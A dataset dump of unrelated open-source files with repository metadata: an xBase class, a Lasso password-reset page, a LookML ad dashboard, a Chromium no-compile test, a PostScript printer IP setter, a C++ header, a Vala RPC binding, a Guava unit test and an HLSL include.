PROPERTY Start AS LONGINT GET iInt1 SET iInt1 := Value
PROPERTY Finish AS LONGINT GET iInt2 SET iInt2 := Value
CONSTRUCTOR(nStart, nFinish)
SUPER(nStart, nFinish)
RETURN
END CLASS
| xBase | 5 | orangesocks/XSharpPublic | Runtime/VOSdkTyped/Source/VOSdk/GUI_Classes_SDK/Support/Pair.prg | [
"Apache-2.0"
] |
<?Lassoscript
// Last modified 7/23/09 by ECL, Landmann InterActive
// FUNCTIONALITY
// Reset password page
// CHANGE NOTES
// 12/12/07
// Recoded for CMS v. 3.0
// 7/23/09
// Added Robot Check
Include:'/siteconfig.lasso';
// Robot check
Include:($svLibsPath)'robotcheck.inc';
// Start the Admin session
Session_Start: -Name=$svSessionAdminName, -Expires=$svSessionTimeout;
// Page head
Include:($svLibsPath)'page_header_admin.inc';
// Debugging
// Var:'svDebug' = 'Y';
?>
<table width="780">
<tr>
<td width="170">
[Include:($svLibsPath)'navbar_main.inc']
</td>
<td>
<div class="contentcontainerwhite">
[Include:'/admin/frm_reset.inc']
</div>
</td>
</tr>
</table>
[Include:($svIncludesPath)'build_footer.inc']
</body>
</html>
| Lasso | 3 | fourplusone/SubEthaEdit | Documentation/ModeDevelopment/Reference Files/LassoScript-HTML/itpage/reset.lasso | [
"MIT"
] |
- dashboard: publisher_overview
title: Publisher Overview
layout: tile
tile_size: 100
elements:
- name: total_impressions
title: Total Impressions
type: single_value
model: doubleclick_dfp
explore: impressions
measures: [impressions.count]
sorts: [impressions.count desc]
limit: '500'
column_limit: '50'
query_timezone: America/Los_Angeles
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
show_null_points: true
point_style: none
interpolation: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
value_format: 0.00,, "M"
totals_color: "#808080"
series_types: {}
height: 1
width: 4
- name: total_clicks
title: Total Clicks
type: single_value
model: doubleclick_dfp
explore: clicks
measures: [clicks.count]
limit: '500'
column_limit: '50'
query_timezone: America/Los_Angeles
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
series_types: {}
value_format: 0.00,, "M"
single_value_title: Total Clicks
height: 1
width: 4
- name: total_users
title: Total Users
type: single_value
model: doubleclick_dfp
explore: impressions
measures: [impressions.users]
limit: '500'
column_limit: '50'
query_timezone: America/Los_Angeles
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
show_null_points: true
point_style: none
interpolation: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
value_format: 0.00,, "M"
totals_color: "#808080"
series_types: {}
height: 1
width: 4
- name: clicks_by_zipcode
title: Clicks By Zipcode
type: looker_geo_coordinates
model: doubleclick_dfp
explore: clicks
dimensions: [clicks.postal_code]
measures: [clicks.count]
filters:
clicks.postal_code: "-NULL"
sorts: [clicks.count desc]
limit: '1000'
column_limit: '50'
query_timezone: America/Los_Angeles
map: usa
map_projection: ''
show_view_names: true
map_plot_mode: points
heatmap_gridlines: false
heatmap_opacity: 0.5
show_region_field: true
draw_map_labels_above_data: true
map_tile_provider: positron
map_position: custom
map_scale_indicator: 'off'
map_pannable: true
map_zoomable: true
map_marker_type: circle
map_marker_icon_name: default
map_marker_radius_mode: proportional_value
map_marker_units: meters
map_marker_proportional_scale_type: linear
map_marker_color_mode: fixed
show_legend: true
quantize_map_value_colors: false
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
series_types: {}
value_format: 0.00,, "M"
single_value_title: Total Clicks
map_latitude: 40.762861133145016
map_longitude: -74.05746459960939
map_zoom: 10
height: 4
width: 6
- name: users_by_zipcode
title: Users By Zipcode
type: looker_geo_coordinates
model: doubleclick_dfp
explore: impressions
dimensions: [impressions.postal_code]
measures: [impressions.users]
filters:
impressions.postal_code: "-NULL"
sorts: [impressions.count desc]
limit: '1000'
column_limit: '50'
query_timezone: America/Los_Angeles
map: usa
map_projection: ''
show_view_names: true
map_plot_mode: points
heatmap_gridlines: false
heatmap_opacity: 0.5
show_region_field: true
draw_map_labels_above_data: true
map_tile_provider: positron
map_position: custom
map_scale_indicator: 'off'
map_pannable: true
map_zoomable: true
map_marker_type: circle
map_marker_icon_name: default
map_marker_radius_mode: proportional_value
map_marker_units: meters
map_marker_proportional_scale_type: linear
map_marker_color_mode: fixed
show_legend: true
quantize_map_value_colors: false
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
series_types: {}
value_format: 0.00,, "M"
single_value_title: Total Clicks
map_latitude: 40.762861133145016
map_longitude: -74.05746459960939
map_zoom: 10
height: 4
width: 6
- name: daily_users_and_impressions
title: Daily Users and Impressions
type: looker_column
model: doubleclick_dfp
explore: impressions
dimensions: [impressions.impression_date]
measures: [impressions.users, impressions.count]
sorts: [impressions.impression_date desc]
limit: '500'
column_limit: '50'
query_timezone: America/Los_Angeles
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: false
limit_displayed_rows: false
y_axis_combined: false
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: ordinal
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
column_group_spacing_ratio: ''
y_axis_orientation: [left, right]
series_types:
impressions.count: line
height: 4
width: 6
- name: top_advertisers
title: Top Advertisers
type: looker_bar
model: doubleclick_dfp
explore: impressions
dimensions: [impressions.advertiser_id]
measures: [impressions.count, impressions.users]
filters:
impressions.advertiser_id: not 0
sorts: [impressions.count desc]
limit: '10'
column_limit: '50'
query_timezone: America/Los_Angeles
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: false
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
show_null_points: true
point_style: none
interpolation: linear
show_row_numbers: true
truncate_column_names: false
hide_totals: false
hide_row_totals: false
table_theme: editable
series_types: {}
- name: thirty_day_clicks_by_owner
title: Thirty Day Clicks by Owner
type: looker_bar
model: doubleclick_dfp
explore: match_table_audience_explorer
dimensions: [match_table_audience_segment.owner_name]
measures: [match_table_audience_explorer.total_thirty_day_clicks]
sorts: [match_table_audience_explorer.total_thirty_day_clicks desc]
limit: '10'
column_limit: '50'
query_timezone: America/Los_Angeles
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
show_null_points: true
point_style: circle
interpolation: linear
series_types: {}
height: 4
width: 6
- name: thirty_day_impressions_by_owner
title: Thirty Day impressions by Owner
type: looker_bar
model: doubleclick_dfp
explore: match_table_audience_explorer
dimensions: [match_table_audience_segment.owner_name]
measures: [match_table_audience_explorer.total_thirty_day_impressions]
sorts: [match_table_audience_explorer.total_thirty_day_impressions desc]
limit: '10'
column_limit: '50'
query_timezone: America/Los_Angeles
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
show_null_points: true
point_style: circle
interpolation: linear
series_types: {}
- name: thirty_day_clicks_by_segment
title: Thirty Day Clicks By Segment
type: looker_pie
model: doubleclick_dfp
explore: match_table_audience_explorer
dimensions: [match_table_audience_segment.segment_type]
measures: [match_table_audience_explorer.total_thirty_day_clicks]
sorts: [match_table_audience_segment.segment_type]
limit: '500'
column_limit: '50'
query_timezone: America/Los_Angeles
value_labels: legend
label_type: labPer
show_value_labels: false
font_size: 12
stacking: ''
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
series_types: {}
- name: thirty_day_impressions_by_segment
title: Thirty Day Impressions By Segment
type: looker_pie
model: doubleclick_dfp
explore: match_table_audience_explorer
dimensions: [match_table_audience_segment.segment_type]
measures: [match_table_audience_explorer.total_thirty_day_impressions]
sorts: [match_table_audience_segment.segment_type]
limit: '500'
column_limit: '50'
query_timezone: America/Los_Angeles
value_labels: legend
label_type: labPer
show_value_labels: false
font_size: 12
stacking: ''
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
series_types: {}
- name: 30_day_clicks_by_segment_overtime
title: Trended 30 Day Clicks by Segment
type: looker_area
model: doubleclick_dfp
explore: match_table_audience_explorer
dimensions: [match_table_audience_segment.segment_type, match_table_audience_segment._data_month]
pivots: [match_table_audience_segment.segment_type]
fill_fields: [match_table_audience_segment._data_month]
measures: [match_table_audience_explorer.total_thirty_day_clicks]
sorts: [match_table_audience_explorer.total_thirty_day_clicks desc 0, match_table_audience_segment.segment_type]
limit: '5'
column_limit: '50'
query_timezone: America/Los_Angeles
stacking: normal
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
show_null_points: true
point_style: none
interpolation: linear
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
ordering: none
show_null_labels: false
value_labels: legend
label_type: labPer
font_size: '12'
series_types: {}
colors: ['palette: Santa Cruz']
series_colors: {}
focus_on_hover: true
- name: 30_day_impressions_by_segment_overtime
title: Trended 30 Day Impressions by Segment
type: looker_area
model: doubleclick_dfp
explore: match_table_audience_explorer
dimensions: [match_table_audience_segment.segment_type, match_table_audience_segment._data_month]
pivots: [match_table_audience_segment.segment_type]
fill_fields: [match_table_audience_segment._data_month]
measures: [match_table_audience_explorer.total_thirty_day_impressions]
sorts: [match_table_audience_explorer.total_thirty_day_impressions desc 0, match_table_audience_segment.segment_type]
limit: '5'
column_limit: '50'
query_timezone: America/Los_Angeles
stacking: normal
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
show_view_names: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
show_null_points: true
point_style: none
interpolation: linear
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
ordering: none
show_null_labels: false
value_labels: legend
label_type: labPer
font_size: '12'
series_types: {}
colors: ['palette: Santa Cruz']
series_colors: {}
focus_on_hover: true
| LookML | 4 | llooker/bq_transfers_dfp | publisher_overview.dashboard.lookml | [
"MIT"
] |
// Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This is a "No Compile Test" suite.
// http://dev.chromium.org/developers/testing/no-compile-tests
#include "base/no_destructor.h"
#include <string>
namespace base {
#if defined(NCTEST_NODESTRUCTOR_REQUIRES_NONTRIVIAL_DESTRUCTOR) // [r"fatal error: static_assert failed due to requirement '!std::is_trivially_destructible<bool>::value || std::is_same<nullptr_t, base::AllowForTriviallyDestructibleType>::value' \"base::NoDestructor is not needed because the templated class has a trivial destructor\""]
// Attempt to make a NoDestructor for a type with a trivial destructor.
void WontCompile() {
NoDestructor<bool> nd;
}
#elif defined(NCTEST_NODESTRUCTOR_PARAMETER) // [r"fatal error: static_assert failed due to requirement 'std::is_same<std::string, base::AllowForTriviallyDestructibleType>::value || std::is_same<std::string, nullptr_t>::value' \"AllowForTriviallyDestructibleType is the only valid option for the second template parameter of NoDestructor\""]
// Attempt to make a NoDestructor for a type with an invalid option.
void WontCompile() {
NoDestructor<std::string, std::string> nd;
}
#endif
} // namespace base
| nesC | 4 | zealoussnow/chromium | base/no_destructor_unittest.nc | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
%!PS-Adobe-3.0
%% This file changes the IP Address on the Xante Accel-a-Writer
%%Setting the IP Address will restart the printer!!
%%Set The IP Address
%(%IP%) <</IPAddress (135.104.7.83)>> setdevparams
%(%IP%) <</NetworkMask (255.255.255.224)>> setdevparams
%(%IP%) <</BroadcastAddress (135.104.7.95)>> setdevparams
%(%IP%) <</GatewayAddress (0.0.0.0/135.104.7.65)>> setdevparams
%serverdict begin 0 exitserver
%systemdict /quit get exec
%% Print out the IP address
%%To print out the current IP Address, comment out the
%%above commands under Set The IP Address with a percent
%%sign. Uncomment the lines below by removing the leading % sign.
/Courier findfont 24 scalefont setfont
(%IP%) currentdevparams
72 72 moveto
/IPAddress get show
72 144 moveto
/NetworkMask get show
72 216 moveto
/BroadcastAddress get show
72 288 moveto
/GatewayAddress get show
showpage | PostScript | 4 | newluhux/plan9port | postscript/prologues/set_ip.ps | [
"MIT"
] |
#ifndef TEST_INTEROP_CXX_TEMPLATES_INPUTS_USING_DIRECTIVE_H
#define TEST_INTEROP_CXX_TEMPLATES_INPUTS_USING_DIRECTIVE_H
template<class T>
struct MagicWrapper {
T t;
int getValuePlusArg(int arg) const { return t.getValue() + arg; }
};
struct IntWrapper {
int value;
int getValue() const { return value; }
};
using UsingWrappedMagicNumber = MagicWrapper<IntWrapper>;
#endif // TEST_INTEROP_CXX_TEMPLATES_INPUTS_USING_DIRECTIVE_H
| C | 4 | gandhi56/swift | test/Interop/Cxx/templates/Inputs/using-directive.h | [
"Apache-2.0"
] |
/*
* Copyright 2014-2019 Jiří Janoušek <janousek.jiri@gmail.com>
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
public class Nuvola.NotificationBinding: ObjectBinding<NotificationInterface> {
public NotificationBinding(Drt.RpcRouter router, WebWorker web_worker) {
base(router, web_worker, "Nuvola.Notification");
}
protected override void bind_methods() {
bind("update", Drt.RpcFlags.PRIVATE|Drt.RpcFlags.WRITABLE,
"Update notification.",
handle_update, {
new Drt.StringParam("name", true, false, null, "Notification name."),
new Drt.StringParam("title", true, false, null, "Notification title."),
new Drt.StringParam("message", true, false, null, "Notification message."),
new Drt.StringParam("icon-name", false, true, null, "Notification icon name."),
new Drt.StringParam("icon-path", false, true, null, "Notification icon path."),
new Drt.BoolParam("resident", false, false, "Whether the notification is resident."),
new Drt.StringParam("category", false, true, null, "Notification category."),
});
bind("set-actions", Drt.RpcFlags.PRIVATE|Drt.RpcFlags.WRITABLE,
"Set notification actions.",
handle_set_actions, {
new Drt.StringParam("name", true, false, null, "Notification name."),
new Drt.StringArrayParam("actions", true, null, "Notification actions.")
});
bind("remove-actions", Drt.RpcFlags.PRIVATE|Drt.RpcFlags.WRITABLE,
"Remove notification actions.",
handle_remove_actions, {
new Drt.StringParam("name", true, false, null, "Notification name.")
});
bind("show", Drt.RpcFlags.PRIVATE|Drt.RpcFlags.WRITABLE,
"Show notification.",
handle_show, {
new Drt.StringParam("name", true, false, null, "Notification name."),
new Drt.BoolParam("force", false, false, "Make sure the notification is shown.")
});
}
private void handle_update(Drt.RpcRequest request) throws Drt.RpcError {
check_not_empty();
string? name = request.pop_string();
string? title = request.pop_string();
string? message = request.pop_string();
string? icon_name = request.pop_string();
string? icon_path = request.pop_string();
bool resident = request.pop_bool();
string? category = request.pop_string();
foreach (var object in objects) {
if (object.update(name, title, message, icon_name, icon_path, resident, category)) {
break;
}
}
request.respond(null);
}
private void handle_set_actions(Drt.RpcRequest request) throws Drt.RpcError {
check_not_empty();
string? name = request.pop_string();
string[] actions = request.pop_strv();
foreach (NotificationInterface object in objects) {
if (object.set_actions(name, (owned) actions)) {
break;
}
}
request.respond(null);
}
private void handle_remove_actions(Drt.RpcRequest request) throws Drt.RpcError {
check_not_empty();
string? name = request.pop_string();
foreach (NotificationInterface object in objects) {
if (object.remove_actions(name)) {
break;
}
}
request.respond(null);
}
private void handle_show(Drt.RpcRequest request) throws Drt.RpcError {
check_not_empty();
string? name = request.pop_string();
bool force = request.pop_bool();
foreach (NotificationInterface object in objects) {
if (object.show(name, force)) {
break;
}
}
request.respond(null);
}
}
| Vala | 4 | xcffl/nuvolaruntime | src/nuvolakit-runner/components/notifications/NotificationBinding.vala | [
"BSD-2-Clause"
] |
/*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.io;
import java.io.ByteArrayOutputStream;
/**
* Unit tests for {@link CountingOutputStream}.
*
* @author Chris Nokleberg
*/
public class CountingOutputStreamTest extends IoTestCase {
public void testCount() throws Exception {
int written = 0;
ByteArrayOutputStream out = new ByteArrayOutputStream();
CountingOutputStream counter = new CountingOutputStream(out);
assertEquals(written, out.size());
assertEquals(written, counter.getCount());
counter.write(0);
written += 1;
assertEquals(written, out.size());
assertEquals(written, counter.getCount());
byte[] data = new byte[10];
counter.write(data);
written += 10;
assertEquals(written, out.size());
assertEquals(written, counter.getCount());
counter.write(data, 0, 5);
written += 5;
assertEquals(written, out.size());
assertEquals(written, counter.getCount());
counter.write(data, 2, 5);
written += 5;
assertEquals(written, out.size());
assertEquals(written, counter.getCount());
// Test that illegal arguments do not affect count
try {
counter.write(data, 0, data.length + 1);
fail("expected exception");
} catch (IndexOutOfBoundsException expected) {
}
assertEquals(written, out.size());
assertEquals(written, counter.getCount());
}
}
| Java | 4 | ksodhi2/guava | guava-tests/test/com/google/common/io/CountingOutputStreamTest.java | [
"Apache-2.0"
] |
#define BLUR_FORMAT float3
#define BLUR_WIDE
#include "blur_gaussian_float4CS.hlsl"
| HLSL | 1 | rohankumardubey/WickedEngine | WickedEngine/shaders/blur_gaussian_wide_float3CS.hlsl | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.